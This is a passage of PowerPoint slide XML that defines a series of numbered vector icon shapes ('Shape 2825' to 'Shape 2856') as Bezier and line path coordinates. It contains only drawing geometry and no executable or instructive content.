                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="14850"/>
                  <a:pt x="16911" y="15068"/>
                  <a:pt x="17182" y="15068"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17453" y="15068"/>
                  <a:pt x="17673" y="14850"/>
                  <a:pt x="17673" y="14581"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17673" y="14313"/>
                  <a:pt x="17453" y="14095"/>
                  <a:pt x="17182" y="14095"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="16200" y="18471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15218" y="18471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14947" y="18471"/>
                  <a:pt x="14727" y="18689"/>
                  <a:pt x="14727" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="19226"/>
                  <a:pt x="14947" y="19443"/>
                  <a:pt x="15218" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16200" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="19443"/>
                  <a:pt x="16691" y="19226"/>
                  <a:pt x="16691" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="18689"/>
                  <a:pt x="16471" y="18471"/>
                  <a:pt x="16200" y="18471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="15218" y="10692"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="16200" y="10692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="10692"/>
                  <a:pt x="16691" y="10475"/>
                  <a:pt x="16691" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="9937"/>
                  <a:pt x="16471" y="9720"/>
                  <a:pt x="16200" y="9720"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15218" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14947" y="9720"/>
                  <a:pt x="14727" y="9937"/>
                  <a:pt x="14727" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="10475"/>
                  <a:pt x="14947" y="10692"/>
                  <a:pt x="15218" y="10692"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4418" y="18471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3436" y="18471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3166" y="18471"/>
                  <a:pt x="2945" y="18689"/>
                  <a:pt x="2945" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="19226"/>
                  <a:pt x="3166" y="19443"/>
                  <a:pt x="3436" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4418" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4689" y="19443"/>
                  <a:pt x="4909" y="19226"/>
                  <a:pt x="4909" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="18689"/>
                  <a:pt x="4689" y="18471"/>
                  <a:pt x="4418" y="18471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7364" y="18471"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6382" y="18471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6111" y="18471"/>
                  <a:pt x="5891" y="18689"/>
                  <a:pt x="5891" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="19226"/>
                  <a:pt x="6111" y="19443"/>
                  <a:pt x="6382" y="19443"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7364" y="19443"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7634" y="19443"/>
                  <a:pt x="7855" y="19226"/>
                  <a:pt x="7855" y="18957"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="18689"/>
                  <a:pt x="7634" y="18471"/>
                  <a:pt x="7364" y="18471"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="4418" y="9720"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3436" y="9720"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3166" y="9720"/>
                  <a:pt x="2945" y="9937"/>
                  <a:pt x="2945" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="10475"/>
                  <a:pt x="3166" y="10692"/>
                  <a:pt x="3436" y="10692"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4418" y="10692"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4689" y="10692"/>
                  <a:pt x="4909" y="10475"/>
                  <a:pt x="4909" y="10206"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="9937"/>
                  <a:pt x="4689" y="9720"/>
                  <a:pt x="4418" y="97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5" name="Shape 2825"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8895423" y="1997893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5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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="3075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6" name="Shape 2826"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9428684" y="1985196"/>
            <a:ext cx="279328" cy="228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2"/>
                  <a:pt x="8836" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="18935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5"/>
                  <a:pt x="10800" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10800" y="18272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2"/>
                  <a:pt x="11782" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11782" y="18935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5"/>
                  <a:pt x="13745" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="18272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9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9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8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6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2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2"/>
                  <a:pt x="16776" y="2582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5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4"/>
                  <a:pt x="18655" y="4237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79"/>
                  <a:pt x="17750" y="2428"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17633" y="1247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2"/>
                  <a:pt x="14727" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14727" y="18935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5"/>
                  <a:pt x="16691" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="18272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2"/>
                  <a:pt x="5891" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="18935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5"/>
                  <a:pt x="7855" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="18272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2"/>
                  <a:pt x="2945" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2945" y="18935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5"/>
                  <a:pt x="4909" y="18603"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4909" y="18272"/>
                  <a:pt x="4690" y="18004"/>
                  <a:pt x="4418" y="1800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7" name="Shape 2827"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10000035" y="1959803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3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10260" y="21404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10269" y="21399"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10393" y="21518"/>
                  <a:pt x="10579" y="21600"/>
                  <a:pt x="10800" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11021" y="21600"/>
                  <a:pt x="11207" y="21518"/>
                  <a:pt x="11331" y="21399"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11340" y="21404"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12898" y="19893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8" name="Shape 2828"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10520599" y="1959803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0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599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0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29" name="Shape 2829"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11028467" y="1959803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6"/>
                  <a:pt x="9987" y="13745"/>
                  <a:pt x="10800" y="13745"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11613" y="13745"/>
                  <a:pt x="12273" y="13086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6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0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0"/>
                  <a:pt x="3960" y="19860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6"/>
                  <a:pt x="19304" y="14981"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19304" y="14981"/>
                  <a:pt x="17640" y="19860"/>
                  <a:pt x="17640" y="19860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4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1" name="Shape 2831"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="918949" y="3331046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0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0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0"/>
                  <a:pt x="11172" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10428" y="0"/>
                  <a:pt x="10125" y="220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2" name="Shape 2832"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1452210" y="3331046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5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5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1"/>
                  <a:pt x="16677" y="4071"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11277" y="144"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11155" y="55"/>
                  <a:pt x="10986" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10614" y="0"/>
                  <a:pt x="10445" y="55"/>
                  <a:pt x="10323" y="144"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4923" y="4071"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4800" y="4161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1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1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3" name="Shape 2833"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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4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9" y="7855"/>
                  <a:pt x="5891" y="10053"/>
                  <a:pt x="5891" y="12764"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5891" y="13643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1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9"/>
                  <a:pt x="11339" y="12919"/>
                  <a:pt x="11147" y="13111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10955" y="13303"/>
                  <a:pt x="10645" y="13303"/>
                  <a:pt x="10453" y="13111"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10261" y="12919"/>
                  <a:pt x="10261" y="12609"/>
                  <a:pt x="10453" y="12417"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="6144" y="17420"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11842" y="13805"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15456" y="8107"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9759" y="11722"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9759" y="11722"/>
                  <a:pt x="6144" y="17420"/>
                  <a:pt x="6144" y="174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4" name="Shape 2834"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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5" name="Shape 2835"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3013903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6" name="Shape 2836"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="3369136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7" name="Shape 2837"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="3362788"/>
            <a:ext cx="279328" cy="2158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6"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16691" y="8016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4"/>
                  <a:pt x="16347" y="6665"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="9502" y="15523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3"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1326" y="6664"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1498" y="6474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8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8" name="Shape 2838"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="335643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69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69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5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5"/>
                  <a:pt x="21543" y="123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39" name="Shape 2839"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="3343743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4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2"/>
                  <a:pt x="12273" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="2999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9"/>
                  <a:pt x="9327" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="2402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3" y="13261"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="7855" y="8640"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="7583" y="8640"/>
                  <a:pt x="7364" y="8882"/>
                  <a:pt x="7364" y="9180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="9329"/>
                  <a:pt x="7418" y="9464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4"/>
                  <a:pt x="14236" y="9329"/>
                  <a:pt x="14236" y="9180"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="8882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0" name="Shape 2840"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208" y="3343743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1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21548" y="13259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16639" y="2459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16635" y="2461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2"/>
                  <a:pt x="15218" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15218" y="2999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9"/>
                  <a:pt x="6382" y="2700"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6382" y="2402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1"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4961" y="2459"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52" y="13259"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57" y="13261"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="23" y="13334"/>
                  <a:pt x="0" y="13413"/>
                  <a:pt x="0" y="13500"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="21060"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="21359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9"/>
                  <a:pt x="21600" y="21060"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21600" y="13500"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="13413"/>
                  <a:pt x="21577" y="13334"/>
                  <a:pt x="21544" y="13261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9"/>
                  <a:pt x="10529" y="12960"/>
                  <a:pt x="10800" y="12960"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11071" y="12960"/>
                  <a:pt x="11291" y="12719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9"/>
                  <a:pt x="14236" y="3780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="3631"/>
                  <a:pt x="14181" y="3497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7"/>
                  <a:pt x="7364" y="3631"/>
                  <a:pt x="7364" y="3780"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7364" y="4079"/>
                  <a:pt x="7583" y="4320"/>
                  <a:pt x="7855" y="432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1" name="Shape 2841"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859" y="3889700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3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69"/>
                  <a:pt x="13745" y="12600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13745" y="14588"/>
                  <a:pt x="12427" y="16200"/>
                  <a:pt x="10800" y="16200"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9173" y="16200"/>
                  <a:pt x="7855" y="14588"/>
                  <a:pt x="7855" y="12600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7855" y="12269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3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3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69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69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69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69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9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69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2" name="Shape 2842"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414120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7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3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7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7"/>
                  <a:pt x="7634" y="14727"/>
                  <a:pt x="7364" y="14727"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1336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7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3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6" y="5891"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1336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2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2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7"/>
                  <a:pt x="0" y="15139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39"/>
                  <a:pt x="21577" y="15067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3" name="Shape 2843"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1947381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4" name="Shape 2844"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480642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6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29"/>
                  <a:pt x="14236" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14236" y="5672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2"/>
                  <a:pt x="20127" y="5400"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="20127" y="491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20127" y="220"/>
                  <a:pt x="19907" y="0"/>
                  <a:pt x="19636" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19366" y="0"/>
                  <a:pt x="19145" y="220"/>
                  <a:pt x="19145" y="491"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19145" y="3962"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17166" y="1546"/>
                  <a:pt x="14167" y="0"/>
                  <a:pt x="10800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29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40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29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29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3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5" name="Shape 2845"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3039296" y="3864307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19"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19087" y="4731"/>
                  <a:pt x="19200" y="4589"/>
                  <a:pt x="19200" y="4418"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19200" y="4248"/>
                  <a:pt x="19087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0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6" name="Shape 2846"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3572557" y="3864307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5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8"/>
                  <a:pt x="11727" y="8747"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11733" y="8754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11774" y="8721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19"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16688" y="4731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8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0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4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7" name="Shape 2847"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4080425" y="3864307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6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6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8" name="Shape 2848"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4613686" y="3864307"/>
            <a:ext cx="279328" cy="279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2"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18643" y="6159"/>
                  <a:pt x="18655" y="6026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79"/>
                  <a:pt x="7550" y="3153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69"/>
                  <a:pt x="3022" y="7101"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1267" y="7686"/>
                  <a:pt x="0" y="9339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89"/>
                  <a:pt x="9327" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="14947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5"/>
                  <a:pt x="982" y="11291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="9810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7"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3946" y="6725"/>
                  <a:pt x="3927" y="6551"/>
                  <a:pt x="3927" y="6382"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3927" y="5028"/>
                  <a:pt x="5028" y="3927"/>
                  <a:pt x="6382" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6662" y="3927"/>
                  <a:pt x="6942" y="3977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89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0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5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7"/>
                  <a:pt x="12273" y="15218"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="15489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1"/>
                  <a:pt x="21600" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="8780"/>
                  <a:pt x="20378" y="7045"/>
                  <a:pt x="18634" y="6292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49" name="Shape 2849"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5146947" y="3883352"/>
            <a:ext cx="279328" cy="241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89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8"/>
                  <a:pt x="12246" y="17782"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12111" y="17511"/>
                  <a:pt x="11811" y="17418"/>
                  <a:pt x="11576" y="17574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4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3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4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4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2"/>
                  <a:pt x="5028" y="4539"/>
                  <a:pt x="6382" y="4539"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6661" y="4539"/>
                  <a:pt x="6942" y="4597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299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8"/>
                  <a:pt x="17666" y="7005"/>
                  <a:pt x="17660" y="7102"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17655" y="7199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7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6"/>
                  <a:pt x="10504" y="14274"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10517" y="14218"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="10484" y="14221"/>
                  <a:pt x="10451" y="14231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2"/>
                  <a:pt x="8088" y="14693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2"/>
                  <a:pt x="8836" y="17589"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8836" y="16857"/>
                  <a:pt x="9142" y="16215"/>
                  <a:pt x="9609" y="15802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8"/>
                  <a:pt x="10283" y="17278"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="10823" y="14952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0" name="Shape 2850"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5680208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0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3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8"/>
                  <a:pt x="0" y="10309"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="10581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3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29"/>
                  <a:pt x="0" y="5400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="5672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1"/>
                  <a:pt x="1319" y="21600"/>
                  <a:pt x="2945" y="21600"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4573" y="21600"/>
                  <a:pt x="5891" y="20281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1" name="Shape 2851"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880859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29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2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8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5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2" name="Shape 2852"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1426816" y="4397568"/>
            <a:ext cx="253935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7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8" y="3927"/>
                  <a:pt x="10800" y="3927"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13782" y="3927"/>
                  <a:pt x="16200" y="6125"/>
                  <a:pt x="16200" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16200" y="10358"/>
                  <a:pt x="15439" y="11717"/>
                  <a:pt x="14244" y="12617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3"/>
                  <a:pt x="14660" y="18979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2" y="11291"/>
                  <a:pt x="13500" y="10192"/>
                  <a:pt x="13500" y="8836"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13500" y="7481"/>
                  <a:pt x="12292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7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3" name="Shape 2853"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1972774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3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9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5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3" y="16809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4" name="Shape 2854"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2480641" y="4397568"/>
            <a:ext cx="279263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4" y="12269"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="9991" y="12269"/>
                  <a:pt x="9331" y="11609"/>
                  <a:pt x="9331" y="10795"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9331" y="9981"/>
                  <a:pt x="9991" y="9322"/>
                  <a:pt x="10804" y="9322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11618" y="9322"/>
                  <a:pt x="12278" y="9981"/>
                  <a:pt x="12278" y="10795"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12278" y="11609"/>
                  <a:pt x="11618" y="12269"/>
                  <a:pt x="10804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69"/>
                  <a:pt x="2457" y="17669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3271" y="17669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5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6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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8397" y="11287"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="8623" y="12408"/>
                  <a:pt x="9613" y="13253"/>
                  <a:pt x="10800" y="13253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11988" y="13253"/>
                  <a:pt x="12978" y="12408"/>
                  <a:pt x="13203" y="11287"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19151" y="11287"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="19422" y="11287"/>
                  <a:pt x="19642" y="11068"/>
                  <a:pt x="19642" y="10796"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="19642" y="4855"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="20759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5" name="Shape 2855"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3026599" y="4397568"/>
            <a:ext cx="253869" cy="279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69"/>
                  <a:pt x="18907" y="17669"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19802" y="17669"/>
                  <a:pt x="20527" y="18329"/>
                  <a:pt x="20527" y="19143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20527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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1082" y="9981"/>
                  <a:pt x="1808" y="9322"/>
                  <a:pt x="2703" y="9322"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3598" y="9322"/>
                  <a:pt x="4323" y="9981"/>
                  <a:pt x="4323" y="10795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7" y="1634"/>
                  <a:pt x="20527" y="2448"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20527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59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2" y="4905"/>
                  <a:pt x="21600" y="3807"/>
                  <a:pt x="21600" y="2452"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="1098"/>
                  <a:pt x="20392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6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8" y="8347"/>
                  <a:pt x="0" y="9445"/>
                  <a:pt x="0" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="12155"/>
                  <a:pt x="1208" y="13253"/>
                  <a:pt x="2698" y="13253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3509" y="13253"/>
                  <a:pt x="4227" y="12921"/>
                  <a:pt x="4722" y="12406"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16347" y="18395"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16262" y="18633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2" y="21600"/>
                  <a:pt x="21600" y="20502"/>
                  <a:pt x="21600" y="19147"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="17792"/>
                  <a:pt x="20392" y="16695"/>
                  <a:pt x="18902" y="1669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6" name="Shape 2856"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3547164" y="4397568"/>
            <a:ext cx="279464" cy="279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5"/>
                  <a:pt x="10421" y="16209"/>
                  <a:pt x="10002" y="16302"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9027" y="16517"/>
                  <a:pt x="8105" y="16493"/>
                  <a:pt x="7342" y="16179"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6912" y="16003"/>
                  <a:pt x="6537" y="15755"/>
                  <a:pt x="6227" y="15442"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5915" y="15129"/>
                  <a:pt x="5669" y="14758"/>
                  <a:pt x="5493" y="14340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3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8"/>
                  <a:pt x="15389" y="7238"/>
                  <a:pt x="15526" y="7692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0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7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3"/>
                  <a:pt x="6002" y="2230"/>
                  <a:pt x="7264" y="1722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1"/>
                  <a:pt x="5132" y="9032"/>
                  <a:pt x="4777" y="10034"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4420" y="11037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89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5"/>
                  <a:pt x="6354" y="16815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3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17934" y="16294"/>
                  <a:pt x="18680" y="15687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4"/>
